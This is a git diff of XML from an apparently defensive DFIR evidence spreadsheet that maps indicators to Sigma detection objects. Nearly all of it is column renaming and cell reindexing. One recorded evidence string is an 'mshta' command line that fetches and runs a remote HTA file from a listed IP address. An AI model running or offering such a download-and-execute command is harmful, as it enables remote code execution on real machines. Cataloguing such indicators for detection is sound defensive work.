-      </c>
+      <c r="C78" s="1"/>
       <c r="D78" s="1" t="s">
-        <v>5</v>
+        <v>7</v>
       </c>
       <c r="E78" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F78" s="1" t="s">
         <v>87</v>
       </c>
-      <c r="F78" s="1"/>
-    </row>
-    <row r="79" spans="1:6" ht="51" x14ac:dyDescent="0.2">
+      <c r="G78" s="1"/>
+    </row>
+    <row r="79" spans="1:7" ht="51" x14ac:dyDescent="0.2">
       <c r="A79" s="1" t="s">
         <v>176</v>
       </c>
       <c r="B79" s="1"/>
-      <c r="C79" s="1" t="s">
-        <v>7</v>
-      </c>
+      <c r="C79" s="1"/>
       <c r="D79" s="1" t="s">
-        <v>5</v>
+        <v>7</v>
       </c>
       <c r="E79" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F79" s="1" t="s">
         <v>88</v>
       </c>
-      <c r="F79" s="1"/>
-    </row>
-    <row r="80" spans="1:6" ht="51" x14ac:dyDescent="0.2">
+      <c r="G79" s="1"/>
+    </row>
+    <row r="80" spans="1:7" ht="51" x14ac:dyDescent="0.2">
       <c r="A80" s="1" t="s">
         <v>177</v>
       </c>
       <c r="B80" s="1"/>
-      <c r="C80" s="1" t="s">
-        <v>7</v>
-      </c>
+      <c r="C80" s="1"/>
       <c r="D80" s="1" t="s">
-        <v>5</v>
+        <v>7</v>
       </c>
       <c r="E80" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F80" s="1" t="s">
         <v>89</v>
       </c>
-      <c r="F80" s="1"/>
-    </row>
-    <row r="81" spans="1:6" ht="51" x14ac:dyDescent="0.2">
+      <c r="G80" s="1"/>
+    </row>
+    <row r="81" spans="1:7" ht="51" x14ac:dyDescent="0.2">
       <c r="A81" s="1" t="s">
         <v>178</v>
       </c>
       <c r="B81" s="1"/>
-      <c r="C81" s="1" t="s">
-        <v>7</v>
-      </c>
+      <c r="C81" s="1"/>
       <c r="D81" s="1" t="s">
-        <v>5</v>
+        <v>7</v>
       </c>
       <c r="E81" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F81" s="1" t="s">
         <v>90</v>
       </c>
-      <c r="F81" s="1"/>
-    </row>
-    <row r="82" spans="1:6" ht="51" x14ac:dyDescent="0.2">
+      <c r="G81" s="1"/>
+    </row>
+    <row r="82" spans="1:7" ht="51" x14ac:dyDescent="0.2">
       <c r="A82" s="1" t="s">
         <v>179</v>
       </c>
       <c r="B82" s="1"/>
-      <c r="C82" s="1" t="s">
-        <v>7</v>
-      </c>
+      <c r="C82" s="1"/>
       <c r="D82" s="1" t="s">
-        <v>5</v>
+        <v>7</v>
       </c>
       <c r="E82" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F82" s="1" t="s">
         <v>91</v>
       </c>
-      <c r="F82" s="1"/>
-    </row>
-    <row r="83" spans="1:6" ht="51" x14ac:dyDescent="0.2">
+      <c r="G82" s="1"/>
+    </row>
+    <row r="83" spans="1:7" ht="51" x14ac:dyDescent="0.2">
       <c r="A83" s="1" t="s">
         <v>180</v>
       </c>
       <c r="B83" s="1"/>
-      <c r="C83" s="1" t="s">
-        <v>7</v>
-      </c>
+      <c r="C83" s="1"/>
       <c r="D83" s="1" t="s">
-        <v>5</v>
+        <v>7</v>
       </c>
       <c r="E83" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F83" s="1" t="s">
         <v>92</v>
       </c>
-      <c r="F83" s="1"/>
-    </row>
-    <row r="84" spans="1:6" ht="51" x14ac:dyDescent="0.2">
+      <c r="G83" s="1"/>
+    </row>
+    <row r="84" spans="1:7" ht="51" x14ac:dyDescent="0.2">
       <c r="A84" s="1" t="s">
         <v>181</v>
       </c>
       <c r="B84" s="1"/>
-      <c r="C84" s="1" t="s">
-        <v>7</v>
-      </c>
+      <c r="C84" s="1"/>
       <c r="D84" s="1" t="s">
-        <v>5</v>
+        <v>7</v>
       </c>
       <c r="E84" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F84" s="1" t="s">
         <v>93</v>
       </c>
-      <c r="F84" s="1"/>
-    </row>
-    <row r="85" spans="1:6" ht="51" x14ac:dyDescent="0.2">
+      <c r="G84" s="1"/>
+    </row>
+    <row r="85" spans="1:7" ht="51" x14ac:dyDescent="0.2">
       <c r="A85" s="1" t="s">
         <v>182</v>
       </c>
       <c r="B85" s="1"/>
-      <c r="C85" s="1" t="s">
-        <v>7</v>
-      </c>
+      <c r="C85" s="1"/>
       <c r="D85" s="1" t="s">
-        <v>5</v>
+        <v>7</v>
       </c>
       <c r="E85" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F85" s="1" t="s">
         <v>94</v>
       </c>
-      <c r="F85" s="1"/>
-    </row>
-    <row r="86" spans="1:6" ht="51" x14ac:dyDescent="0.2">
+      <c r="G85" s="1"/>
+    </row>
+    <row r="86" spans="1:7" ht="51" x14ac:dyDescent="0.2">
       <c r="A86" s="1" t="s">
         <v>183</v>
       </c>
       <c r="B86" s="1"/>
-      <c r="C86" s="1" t="s">
-        <v>7</v>
-      </c>
+      <c r="C86" s="1"/>
       <c r="D86" s="1" t="s">
-        <v>5</v>
+        <v>7</v>
       </c>
       <c r="E86" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F86" s="1" t="s">
         <v>95</v>
       </c>
-      <c r="F86" s="1"/>
-    </row>
-    <row r="87" spans="1:6" ht="51" x14ac:dyDescent="0.2">
+      <c r="G86" s="1"/>
+    </row>
+    <row r="87" spans="1:7" ht="51" x14ac:dyDescent="0.2">
       <c r="A87" s="1" t="s">
         <v>184</v>
       </c>
       <c r="B87" s="1"/>
-      <c r="C87" s="1" t="s">
-        <v>7</v>
-      </c>
+      <c r="C87" s="1"/>
       <c r="D87" s="1" t="s">
-        <v>5</v>
+        <v>7</v>
       </c>
       <c r="E87" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F87" s="1" t="s">
         <v>96</v>
       </c>
-      <c r="F87" s="1"/>
-    </row>
-    <row r="88" spans="1:6" ht="51" x14ac:dyDescent="0.2">
+      <c r="G87" s="1"/>
+    </row>
+    <row r="88" spans="1:7" ht="51" x14ac:dyDescent="0.2">
       <c r="A88" s="1" t="s">
         <v>185</v>
       </c>
       <c r="B88" s="1"/>
-      <c r="C88" s="1" t="s">
-        <v>7</v>
-      </c>
+      <c r="C88" s="1"/>
       <c r="D88" s="1" t="s">
-        <v>5</v>
+        <v>7</v>
       </c>
       <c r="E88" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F88" s="1" t="s">
         <v>97</v>
       </c>
-      <c r="F88" s="1"/>
-    </row>
-    <row r="89" spans="1:6" ht="51" x14ac:dyDescent="0.2">
+      <c r="G88" s="1"/>
+    </row>
+    <row r="89" spans="1:7" ht="51" x14ac:dyDescent="0.2">
       <c r="A89" s="1" t="s">
         <v>186</v>
       </c>
       <c r="B89" s="1"/>
-      <c r="C89" s="1" t="s">
-        <v>7</v>
-      </c>
+      <c r="C89" s="1"/>
       <c r="D89" s="1" t="s">
-        <v>5</v>
+        <v>7</v>
       </c>
       <c r="E89" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F89" s="1" t="s">
         <v>98</v>
       </c>
-      <c r="F89" s="1"/>
-    </row>
-    <row r="90" spans="1:6" ht="51" x14ac:dyDescent="0.2">
+      <c r="G89" s="1"/>
+    </row>
+    <row r="90" spans="1:7" ht="51" x14ac:dyDescent="0.2">
       <c r="A90" s="1" t="s">
         <v>187</v>
       </c>
       <c r="B90" s="1"/>
-      <c r="C90" s="1" t="s">
-        <v>7</v>
-      </c>
+      <c r="C90" s="1"/>
       <c r="D90" s="1" t="s">
-        <v>5</v>
+        <v>7</v>
       </c>
       <c r="E90" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F90" s="1" t="s">
         <v>99</v>
       </c>
-      <c r="F90" s="1"/>
+      <c r="G90" s="1"/>
     </row>
   </sheetData>
   <phoneticPr fontId="1" type="noConversion"/>

--- a/delta2/lib_e/dfir_osir/dfir_20250224.xlsx
+++ b/delta2/lib_e/dfir_osir/dfir_20250224.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/dfir_osir/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{960BBE2A-3494-2F4B-BD3A-8E2710D120D4}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{0A2509B4-AD68-014C-8FAA-24A324E75838}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="160" yWindow="-20940" windowWidth="38080" windowHeight="20800" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
@@ -36,20 +36,11 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="389" uniqueCount="191">
-  <si>
-    <t>evidence_object</t>
-  </si>
-  <si>
-    <t>non_standard_meta</t>
-  </si>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="389" uniqueCount="192">
   <si>
     <t>eid</t>
   </si>
   <si>
-    <t>source_type</t>
-  </si>
-  <si>
     <t>map_pid</t>
   </si>
   <si>
@@ -59,9 +50,6 @@
     <t>dfir20240224-eid0001</t>
   </si>
   <si>
-    <t>open source intel report</t>
-  </si>
-  <si>
     <t>{"process_command_line": "mshta http://92.51.2.22:443/TNillGnQ.hta"}</t>
   </si>
   <si>
@@ -609,6 +597,21 @@
   </si>
   <si>
     <t>process_create-windows_any</t>
+  </si>
+  <si>
+    <t>object</t>
+  </si>
+  <si>
+    <t>eid_type</t>
+  </si>
+  <si>
+    <t>evidence</t>
+  </si>
+  <si>
+    <t>sigma_object</t>
+  </si>
+  <si>
+    <t>ns_meta</t>
   </si>
 </sst>
 </file>
@@ -703,11 +706,11 @@
   <tableColumns count="7">
     <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="6"/>
     <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="5"/>
-    <tableColumn id="3" xr3:uid="{70FFC8DD-7FB0-5A49-BE20-F529AF25CCD3}" name="map_did" dataDxfId="0"/>
-    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="source_type" dataDxfId="4"/>
-    <tableColumn id="5" xr3:uid="{EB72065A-5D22-8549-8CE0-1A9677239F1C}" name="non_standard_meta" dataDxfId="3"/>
-    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence_object" dataDxfId="2"/>
+    <tableColumn id="3" xr3:uid="{70FFC8DD-7FB0-5A49-BE20-F529AF25CCD3}" name="map_did" dataDxfId="4"/>
+    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="3"/>
+    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="2"/>
     <tableColumn id="2" xr3:uid="{872EF6CA-4C9B-CF4C-B421-FE2A8BF10223}" name="description" dataDxfId="1"/>
+    <tableColumn id="8" xr3:uid="{CEEA7FC1-453D-AA4E-9A45-AF9F867065EE}" name="ns_meta" dataDxfId="0"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleMedium15" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
@@ -1032,1608 +1035,1609 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
   <dimension ref="A1:G90"/>
   <sheetViews>
-    <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="F7" sqref="F7"/>
+    <sheetView tabSelected="1" topLeftCell="F1" workbookViewId="0">
+      <selection activeCell="H3" sqref="H3"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
   <cols>
     <col min="1" max="1" width="19.1640625" bestFit="1" customWidth="1"/>
     <col min="2" max="2" width="18.83203125" customWidth="1"/>
-    <col min="3" max="3" width="21.5" customWidth="1"/>
+    <col min="3" max="3" width="14.33203125" bestFit="1" customWidth="1"/>
     <col min="4" max="4" width="13.6640625" bestFit="1" customWidth="1"/>
-    <col min="5" max="5" width="62.5" customWidth="1"/>
-    <col min="6" max="6" width="143.33203125" customWidth="1"/>
-    <col min="7" max="10" width="44.33203125" customWidth="1"/>
+    <col min="5" max="5" width="143.33203125" customWidth="1"/>
+    <col min="6" max="6" width="71.83203125" customWidth="1"/>
+    <col min="7" max="7" width="124.1640625" customWidth="1"/>
+    <col min="8" max="9" width="44.33203125" customWidth="1"/>
   </cols>
   <sheetData>
     <row r="1" spans="1:7" x14ac:dyDescent="0.2">
       <c r="A1" t="s">
-        <v>2</v>
+        <v>0</v>
       </c>
       <c r="B1" t="s">
+        <v>1</v>
+      </c>
+      <c r="C1" t="s">
+        <v>185</v>
+      </c>
+      <c r="D1" t="s">
+        <v>188</v>
+      </c>
+      <c r="E1" t="s">
+        <v>189</v>
+      </c>
+      <c r="F1" t="s">
+        <v>23</v>
+      </c>
+      <c r="G1" t="s">
+        <v>191</v>
+      </c>
+    </row>
+    <row r="2" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A2" s="1" t="s">
+        <v>3</v>
+      </c>
+      <c r="B2" s="1" t="s">
+        <v>184</v>
+      </c>
+      <c r="C2" s="1" t="s">
+        <v>186</v>
+      </c>
+      <c r="D2" s="1" t="s">
+        <v>187</v>
+      </c>
+      <c r="E2" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="F2" s="1"/>
+      <c r="G2" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="3" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A3" s="1" t="s">
+        <v>96</v>
+      </c>
+      <c r="B3" s="1" t="s">
+        <v>184</v>
+      </c>
+      <c r="C3" s="1" t="s">
+        <v>186</v>
+      </c>
+      <c r="D3" s="1" t="s">
+        <v>187</v>
+      </c>
+      <c r="E3" s="1" t="s">
         <v>4</v>
       </c>
-      <c r="C1" t="s">
-        <v>189</v>
-      </c>
-      <c r="D1" t="s">
-        <v>3</v>
-      </c>
-      <c r="E1" t="s">
-        <v>1</v>
-      </c>
-      <c r="F1" t="s">
-        <v>0</v>
-      </c>
-      <c r="G1" t="s">
-        <v>27</v>
-      </c>
-    </row>
-    <row r="2" spans="1:7" ht="51" x14ac:dyDescent="0.2">
-      <c r="A2" s="1" t="s">
-        <v>6</v>
-      </c>
-      <c r="B2" s="1" t="s">
-        <v>188</v>
-      </c>
-      <c r="C2" s="1" t="s">
-        <v>190</v>
-      </c>
-      <c r="D2" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E2" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F2" s="1" t="s">
-        <v>11</v>
-      </c>
-      <c r="G2" s="1"/>
-    </row>
-    <row r="3" spans="1:7" ht="51" x14ac:dyDescent="0.2">
-      <c r="A3" s="1" t="s">
-        <v>100</v>
-      </c>
-      <c r="B3" s="1" t="s">
-        <v>188</v>
-      </c>
-      <c r="C3" s="1" t="s">
-        <v>190</v>
-      </c>
-      <c r="D3" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E3" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F3" s="1" t="s">
-        <v>8</v>
-      </c>
-      <c r="G3" s="1"/>
-    </row>
-    <row r="4" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+      <c r="F3" s="1"/>
+      <c r="G3" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="4" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A4" s="1" t="s">
-        <v>101</v>
+        <v>97</v>
       </c>
       <c r="B4" s="1"/>
       <c r="C4" s="1" t="s">
-        <v>190</v>
+        <v>186</v>
       </c>
       <c r="D4" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E4" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F4" s="1" t="s">
-        <v>21</v>
-      </c>
-      <c r="G4" s="1"/>
-    </row>
-    <row r="5" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>17</v>
+      </c>
+      <c r="F4" s="1"/>
+      <c r="G4" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="5" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A5" s="1" t="s">
-        <v>102</v>
+        <v>98</v>
       </c>
       <c r="B5" s="1"/>
       <c r="C5" s="1" t="s">
-        <v>190</v>
+        <v>186</v>
       </c>
       <c r="D5" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E5" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F5" s="1" t="s">
-        <v>22</v>
-      </c>
-      <c r="G5" s="1"/>
-    </row>
-    <row r="6" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>18</v>
+      </c>
+      <c r="F5" s="1"/>
+      <c r="G5" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="6" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A6" s="1" t="s">
-        <v>103</v>
+        <v>99</v>
       </c>
       <c r="B6" s="1"/>
       <c r="C6" s="1" t="s">
-        <v>190</v>
+        <v>186</v>
       </c>
       <c r="D6" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E6" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F6" s="1" t="s">
-        <v>23</v>
-      </c>
-      <c r="G6" s="1"/>
-    </row>
-    <row r="7" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>19</v>
+      </c>
+      <c r="F6" s="1"/>
+      <c r="G6" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="7" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A7" s="1" t="s">
-        <v>104</v>
+        <v>100</v>
       </c>
       <c r="B7" s="1"/>
       <c r="C7" s="1" t="s">
-        <v>190</v>
+        <v>186</v>
       </c>
       <c r="D7" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E7" s="1" t="s">
         <v>5</v>
       </c>
-      <c r="F7" s="1" t="s">
-        <v>9</v>
-      </c>
-      <c r="G7" s="1"/>
-    </row>
-    <row r="8" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+      <c r="F7" s="1"/>
+      <c r="G7" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="8" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A8" s="1" t="s">
-        <v>105</v>
+        <v>101</v>
       </c>
       <c r="B8" s="1"/>
       <c r="C8" s="1"/>
       <c r="D8" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E8" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F8" s="1" t="s">
-        <v>10</v>
-      </c>
-      <c r="G8" s="1"/>
-    </row>
-    <row r="9" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>6</v>
+      </c>
+      <c r="F8" s="1"/>
+      <c r="G8" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="9" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A9" s="1" t="s">
-        <v>106</v>
+        <v>102</v>
       </c>
       <c r="B9" s="1"/>
       <c r="C9" s="1"/>
       <c r="D9" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E9" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F9" s="1" t="s">
-        <v>53</v>
-      </c>
-      <c r="G9" s="1"/>
-    </row>
-    <row r="10" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>49</v>
+      </c>
+      <c r="F9" s="1"/>
+      <c r="G9" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="10" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A10" s="1" t="s">
-        <v>107</v>
+        <v>103</v>
       </c>
       <c r="B10" s="1"/>
       <c r="C10" s="1"/>
       <c r="D10" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E10" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F10" s="1" t="s">
-        <v>54</v>
-      </c>
-      <c r="G10" s="1"/>
-    </row>
-    <row r="11" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>50</v>
+      </c>
+      <c r="F10" s="1"/>
+      <c r="G10" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="11" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A11" s="1" t="s">
-        <v>108</v>
+        <v>104</v>
       </c>
       <c r="B11" s="1"/>
       <c r="C11" s="1"/>
       <c r="D11" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E11" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F11" s="1" t="s">
-        <v>55</v>
-      </c>
-      <c r="G11" s="1"/>
-    </row>
-    <row r="12" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>51</v>
+      </c>
+      <c r="F11" s="1"/>
+      <c r="G11" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="12" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A12" s="1" t="s">
-        <v>109</v>
+        <v>105</v>
       </c>
       <c r="B12" s="1"/>
       <c r="C12" s="1" t="s">
-        <v>190</v>
+        <v>186</v>
       </c>
       <c r="D12" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E12" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F12" s="1" t="s">
-        <v>12</v>
-      </c>
-      <c r="G12" s="1"/>
-    </row>
-    <row r="13" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>8</v>
+      </c>
+      <c r="F12" s="1"/>
+      <c r="G12" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="13" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A13" s="1" t="s">
-        <v>110</v>
+        <v>106</v>
       </c>
       <c r="B13" s="1"/>
       <c r="C13" s="1"/>
       <c r="D13" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E13" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F13" s="1" t="s">
-        <v>14</v>
-      </c>
-      <c r="G13" s="1"/>
-    </row>
-    <row r="14" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>10</v>
+      </c>
+      <c r="F13" s="1"/>
+      <c r="G13" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="14" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A14" s="1" t="s">
-        <v>111</v>
+        <v>107</v>
       </c>
       <c r="B14" s="1"/>
       <c r="C14" s="1" t="s">
-        <v>190</v>
+        <v>186</v>
       </c>
       <c r="D14" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E14" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F14" s="1" t="s">
-        <v>13</v>
-      </c>
-      <c r="G14" s="1"/>
-    </row>
-    <row r="15" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>9</v>
+      </c>
+      <c r="F14" s="1"/>
+      <c r="G14" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="15" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A15" s="1" t="s">
-        <v>112</v>
+        <v>108</v>
       </c>
       <c r="B15" s="1"/>
       <c r="C15" s="1" t="s">
-        <v>190</v>
+        <v>186</v>
       </c>
       <c r="D15" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E15" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F15" s="1" t="s">
-        <v>15</v>
-      </c>
-      <c r="G15" s="1"/>
-    </row>
-    <row r="16" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>11</v>
+      </c>
+      <c r="F15" s="1"/>
+      <c r="G15" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="16" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A16" s="1" t="s">
-        <v>113</v>
+        <v>109</v>
       </c>
       <c r="B16" s="1"/>
       <c r="C16" s="1" t="s">
-        <v>190</v>
+        <v>186</v>
       </c>
       <c r="D16" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E16" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F16" s="1" t="s">
-        <v>16</v>
-      </c>
-      <c r="G16" s="1"/>
-    </row>
-    <row r="17" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>12</v>
+      </c>
+      <c r="F16" s="1"/>
+      <c r="G16" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="17" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A17" s="1" t="s">
-        <v>114</v>
+        <v>110</v>
       </c>
       <c r="B17" s="1"/>
       <c r="C17" s="1"/>
       <c r="D17" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E17" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F17" s="1" t="s">
-        <v>37</v>
-      </c>
-      <c r="G17" s="1"/>
-    </row>
-    <row r="18" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>33</v>
+      </c>
+      <c r="F17" s="1"/>
+      <c r="G17" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="18" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A18" s="1" t="s">
-        <v>115</v>
+        <v>111</v>
       </c>
       <c r="B18" s="1"/>
       <c r="C18" s="1"/>
       <c r="D18" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E18" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F18" s="1" t="s">
-        <v>36</v>
-      </c>
-      <c r="G18" s="1"/>
-    </row>
-    <row r="19" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>32</v>
+      </c>
+      <c r="F18" s="1"/>
+      <c r="G18" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="19" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A19" s="1" t="s">
-        <v>116</v>
+        <v>112</v>
       </c>
       <c r="B19" s="1"/>
       <c r="C19" s="1"/>
       <c r="D19" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E19" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F19" s="1" t="s">
-        <v>35</v>
-      </c>
-      <c r="G19" s="1"/>
-    </row>
-    <row r="20" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>31</v>
+      </c>
+      <c r="F19" s="1"/>
+      <c r="G19" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="20" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A20" s="1" t="s">
-        <v>117</v>
+        <v>113</v>
       </c>
       <c r="B20" s="1"/>
       <c r="C20" s="1"/>
       <c r="D20" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E20" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F20" s="1" t="s">
-        <v>34</v>
-      </c>
-      <c r="G20" s="1"/>
-    </row>
-    <row r="21" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>30</v>
+      </c>
+      <c r="F20" s="1"/>
+      <c r="G20" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="21" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A21" s="1" t="s">
-        <v>118</v>
+        <v>114</v>
       </c>
       <c r="B21" s="1"/>
       <c r="C21" s="1"/>
       <c r="D21" s="1" t="s">
-        <v>7</v>
+        <v>187</v>
       </c>
       <c r="E21" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F21" s="1" t="s">
-        <v>33</v>
-      </c>
-      <c r="G21" s="1"/>
-    </row>
-    <row r="22" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>29</v>
+      </c>
+      <c r="F21" s="1"/>
